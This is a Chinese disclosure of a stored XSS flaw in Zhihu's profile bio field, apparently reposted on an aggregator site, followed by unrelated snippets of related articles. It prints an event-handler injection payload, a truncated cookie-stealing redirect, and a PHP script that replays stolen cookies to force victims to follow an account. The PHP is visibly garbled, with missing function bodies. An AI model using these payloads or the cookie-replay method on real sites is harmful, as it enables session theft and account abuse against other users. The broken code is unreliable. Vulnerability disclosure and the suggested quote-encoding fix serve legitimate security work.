知乎在編輯個人資料「一句話介紹」處,沒有過濾雙引號(過濾了),導致span後內容可控,即形如,在啤酒@wooyun大神的指點下,終於想到在一句話介紹這裡寫入test" onmousemove="alert(/xss/) 只要其他使用者瀏覽我的主頁,並且滑鼠點到介紹位置,就會觸發**執行,xss。
不知道怎樣新增外部js,本來是打算這樣
test
無奈,伺服器端有長度限制。
最後還是盜取cookie吧,大家都懂,就不細說了,一句話中寫入
最終結果:
x"onmouseout=window.location='…
但是盜取cookie有什麼用?寫乙個php證明一下,這個cookie可以做很多事:
<?php
function uc_fopen($url,$post = '', $cookie = '',$limit = 0, $bysocket = false, $ip = '', $timeout = 15, $block = true) else
$fp = @fsockopen(($ip ? $ip : $host), $port, $errno, $errstr, $timeout);
if(!$fp) else
}$stop = false;
while(!feof($fp) && !$stop) }}
@fclose($fp);
return $return;}}
$cookie = $_get['c'];
echo $cookie;
$data ='type=people&id=28bb2b6ff09a5072198351434ab2efff&status=1';
$url='';
echo uc_fopen($url,$data,$cookie);
?>
這個php主要實現新增對yolfilm賬號的關注。當有人瀏覽我的個人資料,當滑鼠移動觸發xss,就會跳轉到這個頁面,進而使用php對yolfilm新增關注。 其他的就不演示了,只要找到操作的資料報,然後使用php指令碼提交就可以實現。
www.2cto.com
而且,知乎所有提交輸入的地方都沒有驗證碼,導致可以自動提交,這個也給php指令碼提交帶來了便利....
另外附送兩個反射xss:
修復方案:
過濾" 編碼輸出
作者 possible
知乎資料爬取及儲存
import requests from pymysql conn import mysql connect url 分析所有請求後發現上面的url可以直接獲取所需資料的json檔案,兩個引數分 別為offset,limit。其中offset控制起始資料序號,limit控制本次資料數量 經測試off...
xss之儲存型
1.將dvwa級別設定為低階 分析原始碼,可以看到首先對兩個引數使用trim函式過濾掉兩邊的空格,然後 message使用mysql real escape string函式轉義sql語句中的特殊字元,使用stripslashes函式過濾掉 對 name引數中使用mysql real escape ...
DVWA實驗儲存型XSS
直接輸入測試,只要檢視這個日誌就會彈出這個資訊,依法炮製試試獲取cookie 輸入,發現並未能獲取到任何資料,經過檢視發現message裡面有字數限制,則只需要進行抓包修改即可。因為是做實驗可以,把檔名什麼的修改的短一點能輸入就能獲取。那麼接下來嘗試視窗的跳轉 輸入即可跳轉 實驗證明少了http 或...